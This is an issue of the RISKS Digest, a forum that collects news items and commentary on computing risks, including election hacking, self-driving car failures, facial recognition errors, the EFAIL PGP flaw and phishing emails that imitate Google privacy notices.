    The Digital Vigilantes Who Hack Back (The New Yorker)
    Bring in the Nerds: EFF Introduces Actual Encryption Experts to U.S. Senate
    Staff (EFF)
    Email Encryption Tools Are No Longer Safe, Researchers Say (Fortune)
    Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw (EFF)
    Once Again, Activists Must Beg the Government to Preserve the
    Right to Repair (Motherboard)
    Widespread Misunderstanding of x86-64 Privileged Instruction
    Leads to Widespread Escalation Hazard (MITRE CVE 2018-8897)
    Alexa and Siri Can Hear This Hidden Command Audio Attacks (NYTimes)
    Buckle Up, Prime Members: Amazon Launches In-Car Delivery (Business Wire)
    Meant to Monitor Inmates' Calls Could Track You Too (NYTimes)
    Cell Phone Location data reportedly available to law enforcement
    without verification/process (Ars Technica)
    During disasters, active Twitter users likely to spread falsehoods:
    Study examines Boston Marathon bombing, Hurricane Sandy; also
    finds most users fail to correct misinformation (Science Daily)
    Face recognition police tools 'staggeringly inaccurate' (BBC.com)
    Intel Documentation Blamed for Multiple Operating System Security Flaws
    (IT Pro)
    The Problem with Chinese GPS (Now I Know)
    U.S. identifies suspect in major leak of CIA hacking tools (WashPo)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Mon, 7 May 2018 22:11:57 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: America continues to ignore the risks of election hacking
    (The New Yorker)

    America Continues to Ignore the Risks of Election Hacking | The New Yorker

    "America's voting systems are hackable in all kinds of ways. As a case
    in point, in 2016, the Election Assistance Commission, the bipartisan
    federal agency that certifies the integrity of voting machines, and
    that will now be tasked with administering Congress's three hundred
    and eighty million dollars, was itself hacked. The stolen data --
    log-in credentials of EAC staff members -- were discovered, by chance,
    by employees of the cybersecurity firm Recorded Future, whose
    computers one night happened upon an informal auction of the stolen
    passwords. ``This guy -- we randomly called him Rasputin -- was in a
    high-profile forum in the darkest of the darkest of the darkest corner
    of the dark Web, where hackers and reverse engineers, ninety-nine per
    cent of them Russian, hang out,'' Christopher Ahlberg, the CEO of
    Recorded Future, told me. ``There was someone from another country in
    the forum who implied he had a government background, and he wanted to
    get his hands on this stuff. That's when we decided we would just buy
    it. So we did, and took it to the government'' -- the U.S. government
    -- ``and the sale ended up being thwarted.'' (Ahlberg wouldn't
    identify which government agency his company had turned the data over
    to. The EAC, in a statement, referred questions about ``the
    investigation or information shared with the government by Recorded
    Future'' to the FBI The FBI, through a Justice Department
    spokesperson, declined to comment.)"

    ------------------------------

    Date: Tue, 8 May 2018 22:00:18 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Russia Tried to Undermine Confidence in Voting Systems, Senators Say
    (NYTimes)

    Russia Tried to Undermine Confidence in Voting Systems, Senators Say

    ------------------------------

    Date: Mon, 14 May 2018 00:55:08 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Virginia election officials assigned 26 voters to the wrong district
    (WashPo)

    More than two dozen voters cast ballots in the wrong race. They were among
    6,000 misassigned voters across the state. It might've cost Democrats a
    pivotal race.

    Va. election officials assigned 26 voters to the wrong district. It might’ve cost Democrats a pivotal race.

    ------------------------------

    Date: Tue, 15 May 2018 00:07:08 -0500
    From: Bruce Schneier <schn...@schneier.com>
    Subject: Securing Elections

    (PGN-excerpted from Bruce's CRYPTO-GRAM, 15 May 2018)

    Elections serve two purposes. The first, and obvious, purpose is to
    accurately choose the winner. But the second is equally important: to
    convince the loser. To the extent that an election system is not
    transparently and auditably accurate, it fails in that second purpose.
    Our election systems are failing, and we need to fix them.

    [This is a long item, perhaps intended for non-RISKS readers.
    Nevertheless, it is highly relevant and timely. The full article is at
    Schneier on Security: Crypto-Gram
    PGN]

    ------------------------------

    Date: Sun, 6 May 2018 01:54:31 +0000
    From: John Colville <John.C...@uts.edu.au>
    Subject: Australian Emergency Calls Fail due to lightning strike (ABC AU)

    Calls to 000 (the Australian emergency phone number) failed to large areas of Australia on May 04 2018.

    Government to investigate Telstra triple-0 outage after emergency calls go unanswered

    Government to conduct investigation into Telstra triple-0 outage

    ------------------------------

    Date: Thu, 3 May 2018 15:51:21 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Self-driving cars' shortcomings revealed in DMV reports (Merc)

    NNSquad
    http://www.mercurynews.com/2018/05/01/self-driving-cars-shortcomings-revealed-in-dmv-reports/

    The disengagement reports themselves identify other problems some
    self-driving vehicles struggle with, for example heavy pedestrian traffic
    or poorly marked lanes. In describing the events that caused their backup
    drivers to take the controls, the companies have provided a new window
    into the road-worthiness -- or not -- of their cars and systems. Baidu, a
    Chinese Internet-search giant, reported a case in which driver had to take
    over because of a faulty steering maneuver by the robot car; several cases
    of "misclassified" traffic lights; a failure to yield for cross traffic;
    delayed braking behind a car that cut quickly in front; drifting out of a
    lane; and delayed perception of a pedestrian walking into the street.

    ------------------------------

    Date: Sat, 12 May 2018 02:29:16 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: VW bugs: "Unpatchable" remote code pwnage (TechBeacon)

    Two security researchers have excoriated Volkswagen Group for selling
    insecure cars. As in: hackable-over-the-Internet insecure.

    They broke into a recent-model VW and an Audi, via the cars' Internet
    connections, and were able to jump from system to system, running arbitrary
    code. Worryingly, they fully pwned the unauthenticated control bus connected
    to some safety-critical systems -- such as the cruise control.

    But VW has no way to push updates to its cars, and won't alert owners to
    visit a dealer for an update.

    http://techbeacon.com/vw-bugs-unpatchable-remote-code-pwnage

    ------------------------------

    Date: Mon, 7 May 2018 15:27:41 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Software bug led to death in Uber's self-driving crash (Ars Technica)

    NNSquad
    http://arstechnica.com/tech-policy/...bug-led-to-death-in-ubers-self-driving-crash/

    The fatal crash that killed pedestrian Elaine Herzberg in Tempe, Arizona,
    in March occurred because of a software bug in Uber's self-driving car
    technology, The Information's Amir Efrati reported on Monday. According to
    two anonymous sources who talked to Efrati, Uber's sensors did, in fact,
    detect Herzberg as she crossed the street with her bicycle.
    Unfortunately, the software classified her as a "false positive" and
    decided it didn't need to stop for her. Distinguishing between real
    objects and illusory ones is one of the most basic challenges of
    developing self-driving car software. Software needs to detect objects
    like cars, pedestrians, and large rocks in its path and stop or swerve to
    avoid them. However, there may be other objects -- like a plastic bag in
    the road or a trash can on the sidewalk -- that a car can safely ignore.
    Sensor anomalies may also cause software to detect apparent objects where
    no objects actually exist.

    [Also noted by Wendy Grossman: Classic case of where you set the
    positive/negative error rate tradeoffs in the classifier, but with the
    consequences amped up because it's a car on public roads, not a bit of
    software deciding between cats and giraffes: if you set the threshold
    too low the car stops (and jolts its passengers) for every plastic bag
    and shadow. If you set it too high...you get deaths. I wouldn't really
    call that a bug; I'd call it an experimental error. So besides the
    risks inherent in deciding where you set the threshold, there's the
    risk of allowing companies like Uber to run their experiments on public
    roads.]

    ------------------------------

    Date: Sun, 13 May 2018 13:35:53 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll (NYT)

    The New York Times
    http://mobile.nytimes.com/2018/05/1...less-cars-and-their-carbon-monoxide-toll.html

    "It seems like a common convenience in a digital age: a car that can be
    powered on and off with the push of a button, rather than the mechanical
    turning of a key. But it is a convenience that can have a deadly effect.

    "On a summer morning last year, Fred Schaub drove his Toyota RAV4 into the
    garage attached to his Florida home and went into the house with the
    wireless key fob, evidently believing the car was shut off. Twenty-nine
    hours later, he was found dead, overcome with carbon monoxide that flooded
    his home while he slept. '``After 75 years of driving, my father thought
    that when he took the key with him when he left the car, the car would be
    off,'' said Mr. Schaub's son Doug.'

    Adoption of technological convenience carries transition risk. The article
    discusses a wrongful death lawsuit boosted by internal Toyota memos that
    discovered recommendations to integrate audible and visual warnings when
    the engine remains active with no key fob inside the vehicle. This
    recommendation was 86'd from implementation. Over 20 people have perished
    from vehicle-generated CO poisoning since 2006.

    ------------------------------

    Date: Sun, 13 May 2018 16:34:51 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: The risk from robot weapons (via The Statesman/Asia News Network,
    published in The Straits Times)

    http://www.straitstimes.com/asia/south-asia/the-risk-from-robot-weapons-the-statesman-contributor

    'A letter warning against the coming race of these weapons was signed in
    2015 by over 1,000 AI experts.'

    'Peter Singer, an expert on future warfare at 'New America", a think tank,
    has said that very powerful forces propel the AI arms race - geopolitical
    compulsions, scientific advances and profit-seeking high technology
    companies.

    'Scharre has also raised the possibility that perhaps because of badly
    written codes or perhaps because of cyber attack by an adversary, military
    use autonomous systems can malfunction, raising possibilities of attack on
    people or soldiers on the same side, or escalating conflicts or killing to
    unintended, highly exaggerated levels.'

    Numerous public proclamations admonishing on AV weapon risks are
    insufficient to deter investment and capability pursuit. There's apparently
    too much momentum among businesses and governments to deflect this
    juggernaut.

    With the Manhattan Project, scientific leadership recognized the risks
    nuclear weapons raised. Some scientists argued for a demonstration, rather
    than deployment, to compel quick Japanese surrender. Nagasaki and Hiroshima
    were destroyed to temporarily establish and project US nuclear hegemony as a
    deterrent.

    Aggressive international diplomacy among progressive governments might
    negotiate an non-proliferation of autonomous weaponry treaty (NPAWT), like
    the Treaty on the Non-Proliferation of Nuclear Weapons (NPT). However,
    an enforceable and verifiable treaty is unlikely to timely emerge given
    historical human proclivity and myopia, despite empirical evidence that
    argues for deliberate restraint and negotiation.

    [A timely reminder on the importance of negotiation to cut the risk of
    war can be found here
    (http://www.nytimes.com/2018/05/11/opinion/nuclear-doomsday-denial.html).]

    ------------------------------

    Date: Sun, 13 May 2018 17:22:56 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Is technology bringing history to life or distorting it? (WashPo)

    *The Washington Post*

    http://www.washingtonpost.com/news/...gy-bringing-history-to-life-or-distorting-it/

    "Whatever its shortcomings, the Kennedy speech is just the latest way that
    history is being digitally re-created, updated and manipulated as never
    before. From meticulously colorized photographs to immersive
    virtual-reality battlefields, scholars, artists and entrepreneurs are
    dragging the old days into the computer age. And scholastic standards are
    straining to keep up.

    "The U.S. Military Academy is working on a phone-based app along the lines
    of Pokemon Go that will let visitors see how George Washington's troops
    strung a massive iron chain across the Hudson River. A team in North
    Carolina has synthesized an important but unrecorded 1960 speech by Martin
    Luther King Jr., acoustically accurate down to the echoes in the Durham
    church."

    Simulation capability has improve to the point where a political leader can
    be used to construct a fictitious speech which appears authentic, with the
    power to convince an enraptured audience. This capability, if exploited by
    mendacious political entities, can accelerate democracy's decline.

    Publication of false and misleading political speech, especially by elected
    authorities, empowers authoritarianism. Current political discourse in the
    US is heavy with misleading facts and falsehoods that confuse public
    sentiment. This manipulation distracts attention from government's intent to
    apparently conceal a hidden political agenda. Exactly what the agenda is,
    beyond "pay for play," is difficult to divine.

    The introduction of bots applied for this purpose introduces an asymmetric
    multiplier for dissembled political discourse. By the time a policy becomes
    apparent through executive enforcement, the bots will have buried the policy
    agenda into a messaging morass that will potentially overwhelm any
    independent observer's (the free press) ability to analyze. The result is
    likely to suppress litigation that thwarts ill-conceived public policy that
    exclusively benefits "payers."

    ------------------------------

    Date: Sat, 5 May 2018 11:51:07 +0200
    From: Alberto Cammozzo <ac+...@zeromx.net>
    Subject: 2,000 wrongly matched with possible criminals at Champions League
    (BBC AU)

    (via Diego Latella)


    More than 2,000 people were wrongly identified as possible criminals by
    facial scanning technology at the 2017 Champions League final in Cardiff.
    South Wales Police used the technology as about 170,000 people were in
    Cardiff for the Real Madrid v Juventus game. But out of the 2,470 potential
    matches with custody pictures - 92% - or 2,297 were wrong.

    Chief Constable Matt Jukes said officers "did not take action" and no one
    was wrongly arrested.

    South Wales Police have made 450 arrests in the last nine months using the
    automatic facial recognition (AFR) software, which scans faces comparing
    them to about 500,000 custody images

    http://www.bbc.co.uk/news/technolog...d5b45569c1|40779d3379c44626b8bf140c4d5e9075|1

    ------------------------------

    Date: Sun, 6 May 2018 15:15:31 +0100
    From: Wols Lists <antl...@youngman.org.uk>
    Subject: KRACK Wi-Fi vulnerability can expose medical devices, patient
    records (Osborne, R 30 68)

    Actually, I believe it exploits a flaw in the most common IMPLEMENTATION
    of the protocol.

    For security reasons, once the key has been checked the first time, the
    recipient forgets it (over-writes it with 0s), so if the attacker can
    interrupt the handshake at that point, they can resend a key of all zeros
    and authenticate.

    The receiver should either abort the handshake completely, or not
    forget the key until the handshake is complete.

    ------------------------------

    Date: Sun, 6 May 2018 22:54:59 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Nigerian Email Scammers Are More Effective Than Ever (WiReD)

    You would think that after decades of analyzing and fighting email spam,
    there'd be a fix by now for the Internet's oldest hustle -- the Nigerian
    Prince scam. There's generally more awareness that a West African noble
    demanding $1,000 in order to send you millions is a scam, but the underlying
    logic of these 00 pay a little, get a lot-- schemes, also known as 419
    fraud, still ensnares a ton of people. In fact, groups of fraudsters in
    Nigeria continue to make millions off of these classic cons. And they
    haven't just refined the techniques and expanded their targets -- they've
    gained minor celebrity status for doing it.

    http://www.wired.com/story/nigerian-email-scammers-more-effective-than-ever

    ------------------------------

    Date: Sun 6 May 2018 11:12:58 -0000
    From: "Wendy M. Grossman" <wen...@pelicancrossing.net>
    Subject: Dark code (DW)

    In the way of the TSB computing disaster (which DW has a long piece on the
    legacy code that runs banking systems, so old that no one understands it any
    more. The problem: you can't stay in business without updating, and updating
    it breaks things.

    Ellen Ullman has often written about this -- see for example 1997's Close to
    the Machine and her more recent sort-of-sequel.

    http://m.dw.com/en/fail-by-design-bankings-legacy-of-dark-code/a-43645522

    ------------------------------

    Date: Sun, 6 May 2018 13:36:41 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Postmortem of Fortnite Service Outage (Epic Games)

    On 11 Apr 2018, we experienced an extended outage coinciding with the
    release of Fortnite 3.5. The outage blocked all logins for all players to
    our platform. We know many millions of you were excited about dropping from
    the Battle Bus with your friends, and it was a long time to wait to check
    out our 3.5 release. We sincerely apologize for the downtime.

    We're sharing more technical details in this post to give you a better
    understanding about what went wrong, what we did to fix it, and how we can
    prevent future issues like this from happening again.

    http://www.epicgames.com/fortnite/en-US/news/postmortem-of-service-outage-4-12

    ------------------------------

    Date: Sun, 6 May 2018 16:31:20 -0700
    From: Mark Thorson <e...@dialup4less.com>
    Subject: Collateral damage (538)

    You can't opt out from other people sharing data about you, such as the
    relative of the Golden State Killer who put DNA data on a website.

    http://fivethirtyeight.com/features/you-cant-opt-out-of-sharing-your-data-even-if-you-didnt-opt-in/

    ------------------------------

    Date: Mon, 7 May 2018 16:16:28 -0400
    From: George Mannes <gma...@gmail.com>
    Subject: Dozens of security cameras hacked in Japan (Mainichi)

    from Mainichi.jp English-language site:
    http://mainichi.jp/english/articles/20180507/p2g/00m/0dm/063000c#cxrecs_s

    TOKYO (Kyodo) -- Dozens of Canon Inc.'s security cameras connected to the
    Internet have been hacked across Japan, making them uncontrollable at
    waterways, a fish market, and a care facility among other places, users said
    Monday. Over 60 cameras nationwide are believed to have been illegally
    accessed so far. ...

    While it remains unclear why Canon cameras have been targeted, the city of
    Yachiyo in Chiba Prefecture and the city of Ageo in Saitama Prefecture,
    which lost control of the cameras for monitoring the levels of their
    waterways, said they had failed to reset the cameras' default passwords.....

    Hackings were also reported at other locations including a fish market in
    Hiroshima, a care facility for the disabled in Kobe, and a Naha branch of a
    company based in Saitama Prefecture....

    [This news item seems custom-designed for a classic-style PGN joke linking
    fishy business at the market, constant comp.risks complaints about poor
    password management, and Hiroshima's hometown baseball team, the Carp. Have
    at it.]

    [OK. Carpe Diem? I had dinner in Kobe's in Lahaina (Maui) last night. I
    have no beef with this item, even if it might smell fishy. ``If you knew
    Sushi like I knew Sushi,'' oh, whatta place... ``She shells seashells by
    the seashore.'' PGN]

    ------------------------------

    Date: Wed, 9 May 2018 23:53:49 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Technology turns our cities into spies for ICE, whether we like
    it or not (LATimes)

    There are more than 30 Oakland Police Department patrol cars roaming the
    city with license plate readers, specialized cameras that can scan and
    record up to 60 license plates per second. Meanwhile, the Alameda County
    Sheriff's Office maintains a fleet of six drones to monitor crime scenes
    when it sees fit. The Alameda County district attorney's office owns a
    StingRay, a device that acts as a fake cell tower and forces phones to give
    up their location. And that's just in one little corner of California.

    Just as consumer electronics continually get faster, cheaper, smaller, and
    more sophisticated, so too do the tools law enforcement uses to spy on
    us. What once demanded significant money and manpower can be accomplished
    easily by machine. This advanced technology is hurtling toward us so fast
    that privacy laws can't keep up.

    http://www.latimes.com/opinion/op-ed/la-oe-farivar-surveillance-tech-20180502-story.html

    ------------------------------

    Date: Sun, 6 May 2018 22:22:09 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Digital Vigilantes Who Hack Back (The New Yorker)

    American companies that fall victim to data breaches want to retaliate
    against the culprits. But can they do so without breaking the law?

    http://www.newyorker.com/magazine/2018/05/07/the-digital-vigilantes-who-hack-back

    ------------------------------

    Date: Wed, 9 May 2018 23:57:31 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Bring in the Nerds: EFF Introduces Actual Encryption Experts to
    U.S. Senate Staff (EFF)

    Electronic Frontier Foundation

    Earlier today in the U.S. Capitol Visitor Center, EFF convened a closed-door
    briefing for Senate staff about the realities of device encryption. While
    policymakers hear frequently from the FBI and the Department of Justice
    about the dangers of encryption and the so-called Going Dark problem, they
    very rarely hear from actual engineers, cryptographers, and computer
    scientists. Indeed, the usual suspects testifying before Congress on
    encryption are nearly the antithesis of technical experts.

    The all-star lineup of panelists included Dr. Matt Blaze, professor of
    computer science at the University of Pennsylvania, Dr. Susan Landau,
    professor of cybersecurity and policy at Tufts University; Erik
    Neuenschwander, Apple's manager of user privacy; and EFF's tech policy
    director Dr. Jeremy Gillula.

    http://www.eff.org/deeplinks/2018/0...ces-actual-encryption-experts-us-senate-staff

    [Incidentally, this is the 20th anniversary of the famous L0pht testimony
    from Mudge's team, which immediately followed my testimony for the
    U.S. Permanent Subcommittee on Investigations of the Senate Committee on
    Governmental Affairs included in Weak Computer Security in Government: Is
    the Public at Risk? <http://www.csl.sri.com/neumann/senate98.html> PGN]

    ------------------------------

    Date: Mon, 14 May 2018 15:06:45 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Email Encryption Tools Are No Longer Safe, Researchers Say (Fortune)

    Throughout the many arguments over encrypted communications, there has been
    at least one constant: the venerable tools for strong email encryption are
    trustworthy. That may no longer be true.

    On Tuesday, well-credentialed cybersecurity researchers will detail what
    they call critical vulnerabilities in widely-used tools for applying PGP/GPG
    and S/MIME encryption. According to Sebastian Schinzel, a professor at the
    Münster University of Applied Sciences in Germany, the flaws could reveal
    the plaintext that email encryption is supposed to cover up -- in both
    current and old emails.

    The researchers are advising everyone to temporarily stop using plugins for
    mail clients like Microsoft Outlook and Apple Mail that automatically
    encrypt and decrypt emails -- at least until someone figures out how to
    remedy the situation. Instead, experts say, people should switch to tools
    like Signal, the encrypted messaging app that's bankrolled by WhatsApp
    co-founder Brian Acton.

    http://fortune.com/2018/05/14/email-encryption-tool-vulnerability-cybersecurity-warning/

    ------------------------------

    Date: Tue, May 15, 2018 at 12:38 AM
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (EFF)

    Erica Portnoy, Danny O'Brien, and Nate Cardozo, EFF, 14 May 2018
    http://www.eff.org/deeplinks/2018/05/not-so-pretty-what-you-need-know-about-e-fail-and-pgp-flaw-0

    Don't panic! But you should stop using PGP for encrypted email and switch
    to a different secure communications method for now.

    A group of researchers released a paper today that describes a new class of
    serious vulnerabilities in PGP (including GPG), the most popular email
    encryption standard. The new paper includes a proof-of-concept exploit that
    can allow an attacker to use the victim's own email client to decrypt
    previously acquired messages and return the decrypted content to the
    attacker without alerting the victim. The proof of concept is only one
    implementation of this new type of attack, and variants may follow in the
    coming days.

    Because of the straightforward nature of the proof of concept, the severity
    of these security vulnerabilities, the range of email clients and plugins
    affected, and the high level of protection that PGP users need and expect,
    EFF is advising PGP users to pause in their use of the tool and seek other
    modes of secure end-to-end communication for now.

    Because we are awaiting the response from the security community of the
    flaws highlighted in the paper, we recommend that for now you uninstall or
    disable your PGP email plug-in. These steps are intended as a temporary,
    conservative stopgap until the immediate risk of the exploit has passed and
    been mitigated against by the wider community. There may be simpler
    mitigations available soon, as vendors and commentators develop narrower
    solutions, but this is the safest stance to take for now. Because sending
    PGP-encrypted emails to an unpatched client will create adverse ecosystem
    incentives to open incoming emails, any of which could be maliciously
    crafted to expose ciphertext to attackers.

    While you may not be directly affected, the other participants in your
    encrypted conversations are likely to be. For this attack, it isn't
    important whether the sender or the receiver of the original secret message
    is targeted. This is because a PGP message is encrypted to both of their
    keys.

    At EFF, we have relied on PGP extensively both internally and to secure
    much of our external-facing email communications. Because of the severity
    of the vulnerabilities disclosed today, we are temporarily dialing down our
    use of PGP for both internal and external email.

    Our recommendations may change as new information becomes available, and we
    will update this post when that happens.

    How The Vulnerabilities Work

    PGP, which stands for Pretty Good Privacy, was first released nearly 27
    years ago by Phil Zimmermann. Extraordinarily innovative for the time, PGP
    transformed the level of privacy protection available for digital
    communications, and has provided tech-savvy users with the ability to
    encrypt files and send secure email to people they've never met. Its strong
    security has protected the messages of journalists, whistleblowers,
    dissidents, and human rights defenders for decades. While PGP is now a
    privately-owned tool, an open source implementation called GNU Privacy
    Guard (GPG) has been widely adopted by the security community in a number
    of contexts, and is described in the OpenPGP Internet standards document.

    The paper describes a series of vulnerabilities that all have in common
    their ability to expose email contents to an attacker when the target opens
    a maliciously crafted email sent to them by the attacker. In these attacks,
    the attacker has obtained a copy of an encrypted message, but was unable to
    decrypt it.

    The first attack is a direct exfiltration attack that is caused by the
    details of how mail clients choose to display HTML to the user. The
    attacker crafts a message that includes the old encrypted message. The
    new message is constructed in such a way that the mail software
    displays the entire decrypted message -- including the captured
    ciphertext -- as unencrypted text. Then the email client's HTML parser
    immediately sends or exfiltrates the decrypted message to a server
    that the attacker controls.

    The second attack abuses the underspecification of certain details in the
    OpenPGP standard to exfiltrate email contents to the attacker by modifying
    a previously captured ciphertext. Here are some technical details of the
    vulnerability, in plain-as-possible language:

    When you encrypt a message to someone else, it scrambles the information
    into ciphertext such that only the recipient can transform it back into
    readable plaintext. But with some encryption algorithms, an attacker can
    modify the ciphertext, and the rest of the message will still decrypt back
    into the correct plaintext. This property is called malleability. This
    means that they can change the message that you read, even if they can't
    read it themselves.

    To address the problem of malleability, modern encryption algorithms add
    mechanisms to ensure integrity, or the property that assures the recipient
    that the message hasn't been tampered with. But the OpenPGP standard says
    that it's ok to send a message that doesn't come with an integrity check.
    And worse, even if the message does come with an integrity check, there are
    known ways to strip off that check. Plus, the standard doesn't say what to
    do when the check fails, so some email clients just tell you that the check
    failed, but show you the message anyway. ...

    http://dewaynenet.wordpress.com/feed/

    ------------------------------

    Date: Wed, 9 May 2018 23:50:09 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Once Again, Activists Must Beg the Government to Preserve the
    Right to Repair (Motherboard)

    The excruciating DMCA section 1201 exemption process is upon us again,
    and the right to repair tractors, cars, and electronics is at stake.

    http://motherboard.vice.com/en_us/article/mbxzyv/dmca-1201-exemptions

    ------------------------------

    Date: Thu, 10 May 2018 04:34:02 -0700
    From: Bob Gezelter <geze...@rlgsc.com>
    Subject: Widespread Misunderstanding of x86-64 Privileged Instruction
    Leads to Widespread Escalation Hazard (MITRE CVE 2018-8897)

    Apparently, a large number kernel-level developers have misunderstood the
    documentation concerning the interruptability of an x86-64 instruction. This
    misunderstanding has made many major operating systems on the x86-64
    platform vulnerable to a privilege escalation hazard.

    Patches have reportedly been issued. Intel has also re-issued its x86-64
    Software Development Manuals.

    A description of the vulnerability can be found at:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897

    [For those of you following the CVE list, it has just exceeded 100,000 CVE
    entries. This should be a warning for anyone reading RISKS who believes
    our computer systems are secure. PGN]

    ------------------------------

    Date: Thu, 10 May 2018 18:01:36 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Alexa and Siri Can Hear This Hidden Command Audio Attacks (NYTimes)

    http://www.nytimes.com/2018/05/10/technology/alexa-siri-hidden-command-audio-attacks.html

    Researchers can now send secret audio instructions undetectable to the human
    ear to Apple's Siri, Amazon's Alexa and Google's Assistant.

    ------------------------------

    Date: Fri, 11 May 2018 11:15:06 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Buckle Up, Prime Members: Amazon Launches In-Car Delivery
    (Business Wire)

    Millions of Prime members with Chevrolet, Buick, GMC, Cadillac and Volvo
    cars can now use Amazon Key to have their Amazon packages delivered inside
    their vehicle parked at home, work or near other locations in their address
    book

    In-car delivery is available at no extra cost for Prime members -- customers
    simply download the Amazon Key App, link to their connected car and start
    ordering on Amazon.com; no additional hardware or devices required

    To get started, customers download the Amazon Key App and then link their
    Amazon account with their connected car service account. Once setup is
    complete and the delivery location has been registered, customers can shop
    on Amazon.com and select the In-Car delivery option at checkout.

    On delivery day, the Amazon Key App lets customers check if they've parked
    within range of the delivery location, and provides notifications with the
    expected 4-hour delivery time window. The App also notifies customers when
    the delivery is on its way, and the package has been delivered. Customers
    can track when their car was unlocked and relocked in the App's activity
    feed, and rate their in-car delivery.

    http://www.businesswire.com/news/ho...Prime-Members-Amazon-Launches-In-Car-Delivery

    ------------------------------

    Date: Sat, 12 May 2018 02:30:18 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Meant to Monitor Inmates' Calls Could Track You Too (NYTimes)

    http://www.nytimes.com/2018/05/10/technology/cellphone-tracking-law-enforcement.html

    A company catering to law enforcement and corrections officers has raised
    privacy concerns with a product that can locate almost anyone's cellphone
    across the United States.

    ------------------------------

    Date: Sat, 12 May 2018 06:38:12 -0700
    From: Bob Gezelter <geze...@rlgsc.com>
    Subject: Cell Phone Location data reportedly available to law enforcement
    without verification/process (Ars Technica)

    Ars Technica is reporting that a service meant for use with prison phone
    systems lacks authentication and safeguards. It has reportedly already been
    used to track people without legal jurisdiction.

    Access to non-anonymized geolocation data for mobile devices by third
    parties is a serious privacy hazard. The article does not indicate the
    degree of reporting or other measures undertaken to ensure accountability.
    In this context, even advertising delivered to a identifiable device is a
    hazard.

    http://arstechnica.com/tech-policy/...bility-to-get-real-time-mobile-location-data/

    ------------------------------

    Date: Sun, 13 May 2018 11:08:59 -0400S
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: During disasters, active Twitter users likely to spread
    falsehoods: Study examines Boston Marathon bombing, Hurricane Sandy; also
    finds most users fail to correct misinformation (Science Daily)

    http://www.sciencedaily.com/releases/2018/05/180512190537.htm

    ------------------------------

    Date: Sun, 13 May 2018 10:01:11 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: "Warning: Dangerous Fake Emails About Google Privacy Changes"

    (Lauren's Blog)
    http://lauren.vortex.com/2018/05/13/warning-dangerous-fake-emails-about-google-privacy-changes

    If you use much of anything Google, by now you've likely gotten at least one
    email from Google noting various privacy-related changes. They typically
    have the Subject:

    Improvements to our Privacy Policy and Privacy Controls

    and tend to arrive not from the expected simple "google.com" domain but
    rather from unusual appearing Google subdomains, with addresses like:

    privacy...@www3.l.google.com

    The notice also includes a bunch of links to various relevant privacy pages
    and/or systems at Google.

    All of this is in advance of the effective date for the European Union's
    "GDPR" laws. If you're not familiar with the GDPR, it's basically the latest
    hypocritical move by the EU on their relentless march toward dictating the
    control of personal data globally and to further their demands to become a
    global censorship czar -- with the ability to demand the deletion of any
    search engine results around the world that they find inconvenient. Joseph
    Stalin would heartily approve.

    One can assume that Google's privacy team has been putting in yeoman's
    service to meet the EU's dictatorial demands, and it's logical that Google
    decided to make other changes in their privacy ecosystem at the same time,
    and now is informing users about those changes.

    Unfortunately, phishing crooks are apparently already taking advantage of
    this situation -- in particular several aspects of these Google notification
    emails.

    First, the legitimate Google privacy emails going out recently and
    currently are a veritable flood. It appears that Google is sending
    these out to virtually every email address ever associated with any
    Google account since perhaps the dawn of time. I've already received
    approximately 1.3E9 of them. OK, not really that many, but it FEELS
    like that many.

    Some of these are coming in to addresses that I don't even recognize.
    This morning one showed up to such a strange address that I had to go
    digging in my alias databases to figure out what it actually was. It
    turned out to be so ancient that cobwebs flew out of my screen at me
    when I accessed its database entry.

    Seriously, these are one hell of a lot of emails, and the fact that
    they come from somewhat unusual looking google subdomains and include
    links has made them fodder for the crooks.

    You can guess what's happening. Phishing and other criminal types are
    sending out fraudulent emails that superficially appear to be the same
    as these legit Google privacy policy notification emails. Of course,
    some or all of the links in the phishing emails lead not to Google but
    to various evil traps and personal data stealing tricks.

    So please, be extraordinarily careful when you receive what appear to be
    these privacy notices from Google. With so many real ones going out -- with
    multiples often ending up at the same individual via various redirects and
    forwarding addresses -- it's easy for fake versions to slip in among the
    real ones, and clicking on the links in the crooked ones or opening
    attachments that they include can seriously ruin your day, to say the very
    least.

    Take care, all.

    ------------------------------

    Date: Mon, 14 May 2018 18:12:34 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Face recognition police tools 'staggeringly inaccurate' (BBC.com)



    'The Metropolitan Police used facial recognition at London's Notting Hill
    carnival in 2016 and 2017 and at a Remembrance Sunday event. 'Its system
    incorrectly flagged 102 people as potential suspects and led to no
    arrests. 'In figures given to Big Brother Watch, South Wales Police said
    its technology had made 2,685 "matches" between May 2017 and March 2018 -
    but 2,451 were false alarms. 'Big Brother Watch also raised concerns that
    photos of any "false alarms" were sometimes kept by police for weeks.'

    Perhaps the UK should import and deploy PRC cameras per RISKS-30.65.

    ------------------------------

    Date: Tue, 15 May 2018 13:25:53 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
